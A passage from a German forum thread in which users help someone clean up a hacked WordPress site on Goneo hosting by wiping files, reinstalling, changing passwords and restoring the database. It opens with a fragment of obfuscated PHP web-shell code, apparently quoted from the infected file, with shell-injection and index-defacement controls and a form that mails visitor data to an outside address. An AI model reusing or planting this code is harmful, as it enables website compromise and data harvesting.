                        </\x73\145\154\x65\x63t>
                        <s\160\141\x6e id='\111\156\152\x65\143\x74\123\x68el\154\x53\160\141n'><sy>\x49\156\152\x65c\x74 \x53h3\154l ? </\163\x79><\x73e\154ec\164 name='\151\x6ej\145\143\x74\x53\150el\x6c' i\x64='\151n\152ectS\150\x65ll' \x6fn\x63h\x61\x6e\x67\x65='\x69n\152\x65\143t\x53h\x65\154\154Fu\156\x63t\151o\156();'><option value='\x6e\157'>N\117</option><option value='\x79es\'>\x59ES</option></s\145\154\145c\164><\x73\171> \126\102\x75\154\154\145\x74i\156 \117\156\x6cy ! </sy></\x73\x70a\x6e><\163p\141n \x69\x64='\111\x6e\152\145\x63\x74\123\x68\145\154\154\x54y\160\x65\x53\160a\x6e'></s\160\141\156>
                        <\144\151\x76 \151\144='\x53\x48\102'><te\x78\164\141\x72\x65\141 name='I\x4eDE\x58' rows='9' id='the\x49\x6e\144\x65\x78' \x63\157l\x73='45' o\x6e\142\x6c\165r='B\154\165\x72(\"t\150\x65\x49\156\144\145\170\",\"\120\165t You\162 \x49\156\144\x65x H\x65\x72\145 !\");' \157n\143l\151\143\153='\103\154\x65\141\162(\"\x74\x68\x65\111\x6e\x64\145\170\",\"\x50\165\x74 Yo\165\162 \111n\144\145x \110\x65r\145 !\");'  >\x50\165\x74 \x59\x6f\165r \111\156d\145\170 \x48\145\x72\145 !</\x74\x65\170ta\x72e\141></\x64iv>    
<input type='submit' value='\x48\141c\153 N\x6fw !!' name='\125\160dat\145\111\x6e\x64\145\170' >
</\x74\x64></\x74\x72></\164abl\145></\x66\x6frm>
<!-- \x45\x6e\x64 \x4f\146 \x53c\162\x69pt\x73 \110\x61c\153\x69n\x67 -->
</\x74\144></\x74\x72>
"; ilI1iii00OiI00I1(); }  
 
 
if($_GET['id']=='about') { echo About(); if($_POST['sendEmail']) { $ip = $_POST['ip']; $httpref = $_POST['httpref']; $httpagent = $_POST['httpagent']; $visitor = $_POST['visitor']; $visitormail = $_POST['visitormail']; $notes = $_POST['notes']; $i10oio010Oi1OI0o = "\163\x7934@m\x73n.c\x6f\155"; if (eregi('http:', $notes)) { echo "<s\143\x72\x69\160t>\x61l\145\x72t('\164\x68\151\x73 \151\x73 \156ot al\154\x6fw\145\x64 !!');</s\x63\162i\x70\164>"; echo "<\163c\162\x69\x70t>hist\157r\x79.\x67\157(-1);</\163c\x72\x69\x70\x74>"; } if(!$visitormail == "" && (!strstr($visitormail,"@") || !strstr($visitormail,"."))) { echo "<\163\x63r\151\x70\x74>\141l\145\162t('En\164\145\162 V\141\154\151\144 \105ma\151\154');</s\x63\x72\x69p\164>\n"; echo "<\x73cr\151\x70\164>h\151\163tor\x79.\x67\157(-1);</sc\x72i\x70\164>"; } if(empty($visitor) || empty($visitormail) || empty($notes )) { echo "<\x73cri\x70t>\x61l\145rt('A\154l \x46iel\144s \x41r\145 \122\x65\161\165\151\162ed !!');</\x73\x63\x72\x69\160\x74> "; echo "<\163\x63ri\x70t>h\x69\x73\164or\171.\x67\x6f(-1);</sc\162i\x70t>"; } $iOIOl00O0li1oIIo = date("\x6c, \106 j, \131, \147:i a") ; $ioOi1OOooo10oI1o = "\116ew Message \x46\x72\157m \123\x79\162ia\x6e-s\150\063l\154 Users"; $notes = stripcslashes($notes); $message = " $iOIOl00O0li1oIIo [EST] \n
        Message: $notes \n
        Fr\x6fm: $visitor ($visitormail)\n
        \101\144\144i\x74\x69\157n\141\x6c \111n\146o : \x49\120 = $ip \n
        \102ro\x77\163e\162 \111\156f\x6f: $httpagent \n
        \122e\146\145\162\162\x61l : $httpref \n
        "; $from = "\106\162o\x6d: $visitormail\r\n"; mail($i10oio010Oi1OI0o, $ioOi1OOooo10oI1o, $message, $from); echo '
        <p align="center">
        Date: '.$iOIOl00O0li1oIIo.'<br />
        Thank You : '.$visitor.' (  '.$visitormail.' )<br />
        <font color="#003399">Your Message Sent Successfully ! </font><br />'; $iIiIi10oiOllIl1l = str_replace("\r", "<\x62\x72/>", $notes); echo $iIiIi10oiOllIl1l; echo '</p>'; } ilI1iii00OiI00I1(); }  
 
 
} ; ?>
 

bergheimer

Roter Delicious
Registriert
03.12.10
Beiträge
91
Ok...hat das jetzt geklappt? Man bin ich gut...-)

Welche Artikel sichern? Vom Blog? Nee, die brauch ich nicht! Nur die Bilder sind wichtig.
Und von welcher DB sprichst Du bzw. DB-Passwörtern?

Kommt noch hinzu, dass ich mit einem externen Theme arbeite "Photocrati"...
 

drlecter

Wöbers Rambur
Registriert
04.11.06
Beiträge
6.442
DB=Datenbank. Also die Datenbanl von Wordpress.
Das Theme ist sekundär. Bei WP kann man beides getrennt updaten.
 

JvW

Kaiser Alexander
Registriert
11.01.11
Beiträge
3.924
Also OK ...

Du müsst alle deine Sachen, die du noch behalten willst, sichern. Und Wordpress ganz neu installieren.

Angenommen, du hast vollem Kopien, ist das einfach:

Mit Filezilla alles löschen, was du auf dem Server findest

Im Kundencenter unter Clickstart eine neue Wordpress-Installation anfordern
dabei ein möglichst sicheres Passwort wählen
Ebenfalls im Kundencenter alle Passworte ändern - für das Kundencenter selber, für den FTP-Zugang und für die Datenbank (mache das als erstes ...)
Sobald das neue Wordpress freigeschaltet ist, als erstes sämtliche Updates einspielen (im Dashboard zu finden, oben links)
Dann Theme einrichten und all sowas und zum Schluß alle wichtigen Inhalte wieder einstellen.
WP kündigt Updates automatisch an, und das sollte man immer auch annehmen

Falls du irgendwelche Inhalte nicht mehr besitzt, solltest du sie vor dem Plätten des Webspace noch runterladen. (und in Zukunft alle Inhalte auch zu Hause sichern!)



Um PHP- Updates und sowas mußt du dir bei Goneo keine Gedanken machen, nur deine eigenen Sachen solltest du aktuell halten - dazu reicht aber das Dashboard von WP völlig aus.
Was da passiert ist, ist höchstwahrscheinlich ein geknacktes (oder erratenes) Passwort, das dazu benutzt wurde, diesen Schadcode auf deinen Webspace zu installieren.
 

bergheimer

Roter Delicious
Registriert
03.12.10
Beiträge
91
Ok, und wie lösche ich die Datenbank?

Ich könnte über den FileZilla die logfiles und/oder die htdocs löschen.
 

JvW

Kaiser Alexander
Registriert
11.01.11
Beiträge
3.924
Goneo-Kundencenter,

Datenbank-Admin-Tool, unter Hosting, glaube ich (komme grad nicht da rein, wg Mac ist außer Betrieb und nur der kennt das Spasswort

Aber in der Hilfe findest du das sicher
 

bergheimer

Roter Delicious
Registriert
03.12.10
Beiträge
91
Also ins Daten-Admin-Tool komm ich nicht rein. Da werde ich nach einem Benutzername und Passwort gefragt.
Ich hab aber die Option, das Zielverzeichnis /htdocs zu löschen.
 

JvW

Kaiser Alexander
Registriert
11.01.11
Beiträge
3.924
... Der Benutzername ist der Name der Datenbank und das Passwort für die Datenbank findest du unter "Datenbanken", dort kann es angezeigt werden (Schalter ganz rechts)
 

bergheimer

Roter Delicious
Registriert
03.12.10
Beiträge
91
Yes, wow! Das hat geklappt. Und nun im Admin-Tool anmelden und dann?

Ich bin nun im Datenbank-Admin-Tool drin.

Und hier sehe ich, dass ich die Inhalte der Datenbank einzeln löschen könnte. Würde ich dann meine Webseite verlieren?

Sorry! Hab grade eben erst deinen vorletzten Beitrag gelesen, da hattest Du das ja schon ausführlich beschrieben.

Dank Dir erst mal. Mein Kopf raucht!

:)
 
Zuletzt bearbeitet:

JvW

Kaiser Alexander
Registriert
11.01.11
Beiträge
3.924
Dort kannst du unter anderem die Tabellen "exportieren" (= sichern), einzeln oder am Stück, und auch Löschen

(wie gesagt, wenn du die wichtigen Inhalte noch anderswo hast, lösche lieber alles)
 

bergheimer

Roter Delicious
Registriert
03.12.10
Beiträge
91
Ich hab jetzt folgendes gemacht:

Im Datenbank-Admin-Tool hab ich alles gelöscht. Vorher exportiert zur Sicherheit.

Dann im FileZilla den htlogs und logfile gelöscht.

Dann wordpress per clikstart neu aufgespielt und dann mein Backup in den htlogs file im FileZilla gezogen. Das scheint geklappt zu haben.

Wie bekomm ich jetzt meine Seite wieder zum laufen? Muss ich Goneo informieren damit sie den Server wieder freischalten?
 

JvW

Kaiser Alexander
Registriert
11.01.11
Beiträge
3.924
Ähm, nein ...

Der Schritt mit dem Backup war schlecht.
das bringt nichts, weil die Daten eh in der Datenbank liegen (und jetzt eben gelöscht sind), und wahrscheinlich hast du die automatischen Einstellungen überschrieben.


Aber egal - auf jeden Fall musst du mit Goneo Kontakt aufnehmen und die Seite wieder freischalten lassen (Hinweis, daß du alles gelöscht und neu installiert hast)
Sobals es wieder läuft, die Updates einspielen

Zur Sicherheit würde ich aber die Sache noch mal löschen (im Goneo-Kundencenter , nicht mit Zilla), und noch mal Installieren - ohne Backup!
dann updaten, sobald freigeschaltet, und dann (bei Bedarf) die Sicherungskopie in die Datenbank zurückspielen (besser aber: Inhalte neu einstellen)
 

bergheimer

Roter Delicious
Registriert
03.12.10
Beiträge
91
Ok, super. Ich dank Dir!

...was bedeutet "Inhalte neu einstellen"?

jo
 

JvW

Kaiser Alexander
Registriert
11.01.11
Beiträge
3.924
Na, deine Artikel und sowas halt - was du so gepostet hast.

Das ist jetztnja erstmal weg, (aber in dem gesicherten File aus der DB noch vorhanden)

Du kannst entweder diese Sicherung wieder einspielen (Datenbank-Admin, importieren) oder eben alles neu einstellen.


Jetzt Schau erstmal, daß die Seite wieder freigeschaltet wird, dann sehen wir weiter, OK?
 

bergheimer

Roter Delicious
Registriert
03.12.10
Beiträge
91
Ok, die Seite ist jetzt wieder freigeschaltet. Worpress habe ich auf den neuesten Stand gebracht, die Passwörter geändert. Nun ist die Frage, wie bekomme ich meine Seite wieder zum laufen....

Im Admin-Tool (Goneo-Kundencenter) hab ich meine Datenbank exportiert, allerdings bin ich mir nicht ganz sicher, ob ich das richtig gemacht habe. Jedenfalls habe ich jetzt eine .sxl-Datei auf meinem Desktop liegen.

Außerdem hab ich noch das Backup der Seite, allerdíngs weiß ich auch nicht mehr genau, wie ich das gemacht habe. Vermutlich den htlogs-file aus Filezilla kopiert, zumindest sehen die Inhalte ähnlich aus.

Ich versuch gleich mal einen Screen-shot von dem Backup-Ordner hier im Forum einzustellen.

Kannst Du mir weiterhelfen?

Danke nochmal im Voraus!
 

wdominik

Weißer Winterglockenapfel
Registriert
15.01.10
Beiträge
880
So ein Wordpress besteht vereinfacht gesagt aus zwei Teilen, zum einen ist das das Programm selbst – zum Anderen ist das der Datenbestand. Letzteres wird in einer sogenannten Datenbank, in diesem Fall MySQL gesichert. Alle Informationen, wie Artikel, Benutzerkonten, Seitentitel und -texte, etc. werden in Form von Tabellen in dieser Datenbank abgelegt. Diese solltest du beim Exportieren der Datenbank gesichert haben.

Das Programm selbst ist das, was dein Screenshoot zeigt. Hier sind die Dateien gespeichert, welche letztendlich die Seiten im Browser aus deinen Daten generieren und auf Interaktion mit dem Benutzer z. B. über den Admin-Bereich reagieren können. Die Daten bleiben in der Regel zunächst unverändert, unabhängig von deiner Seite. Ausnahme bilden Themes und Plugins, diese werden in diese Verzeichnisstruktur integriert. Auch Binärdaten, welche du deinen Artikeln oder Seiten anhängst, wie z. B. Bilder, werden in einem dafür vorgesehenen Verzeichnis gespeichert.
(Bist du dir eigentlich sicher, dass der Ordner htlogs heißt und nicht htdocs? Unter Logs versteht man nämlich normalerweise Protokolldateien, welche nur Zugriffe, Fehler, Warnungen, etc. aufzeichnen – deine Seite bzw. Wordpress wäre in dem Ordner somit irgendwie fehl am Platz.)

Du solltest jetzt auf keinen Fall die kompletten Dateien (die, die du mit Filezilla kopiert hast) wieder hochladen, da du sonst natürlich die fehlerhaften Dateien wieder mit hochschiebst. Auch wenn du gezielt die css.php weg lassen würdest, weißt du nicht, welche Dateien noch modifiziert wurden und somit eine Sicherheitslücke darstellen. Vielmehr solltest du jetzt dein Theme und evtl. Plugins wieder komplett neu installieren. Hier auch unbedingt darauf achten, dass die Dateien aus seriösen Quellen stammen, sonst lädst du dir wieder gleich Schadcode mit rein. Wenn das dann alles wieder vorhanden ist, solltest du versuchen, dass Backup der Datenbank (welches du im Admin-Bereich angefertigt hast) wieder einzuspielen. Und zu guter letzt auf jeden Fall die Passwörter für die Wordpress-Benutzer ändern.
 

bergheimer

Roter Delicious
Registriert
03.12.10
Beiträge
91
Richtig, htdocs heißt der Ordner oder die Datei!

nein, die fehlerhafte Datei dürfte zu dem damaligen Zeitpunkt noch nicht auf dem Server gelegen haben, da ich das Back-Up gleich nach Fertigstellung der Seite angefertigt hatte, Ich vermute mal, dass der Hack später erfolgte....

Ok, aber wenn ich's richtig verstanden habe genügt dazu die .sql-Datei. Das werde ich dann mal versuchen...Und wo liegen dann die ganzen Bilder von meiner Homepage?!?

Übrigens habe ich das Backup von der Datenbank aus dem Goneo-Kundencenter erst gestern angefertigt, d.h. zu diesem Zeitpunkt lag der Schadcode definitiv auf dem Server. Hole ich mir den dann bei dem Import nicht mit auf den Server oder sind das nur Einstellungen die ich importiere?
 

timmy38233

Rhode Island Greening
Registriert
20.07.08
Beiträge
474
Die Bilder und anderen Binärdateien werden üblicherweise im Ordner "wp-content/uploads/" gespeichert. Dort sind dann wiederum Ordner, die den Jahres- und Monatszahlen des Uploadzeitpunkts entsprechen. Wenn Du also zum Beispiel am 03. September 2011 ein Bild hochgeladen hast, dann findest Du dieses Bild im Ordner "wp-content/uploads/2011/09/".

Zu jedem Bild wirst Du noch Kopien finden die WordPress für die verschiedenen Größen anlegt. Wunder Dich also nicht, wenn zu dem Bild (folgendes ist nur ein Beispiel) "Bildname.png" noch 2 weitere mit den Namen "Bildname-125x82.png" und "Bildname-56x56.png" oder so in dem Ordner sind. Die Originalgröße ist dann immer das Bild ohne Größenzusatz.


Noch zur Info: Wenn Du das Backup direkt nach Fertigstellung der Seite gemacht hast, aber nachträglich noch Bilder zu der Seite hinzugefügt hast, dann sind diese natürlich nicht im Backup enthalten!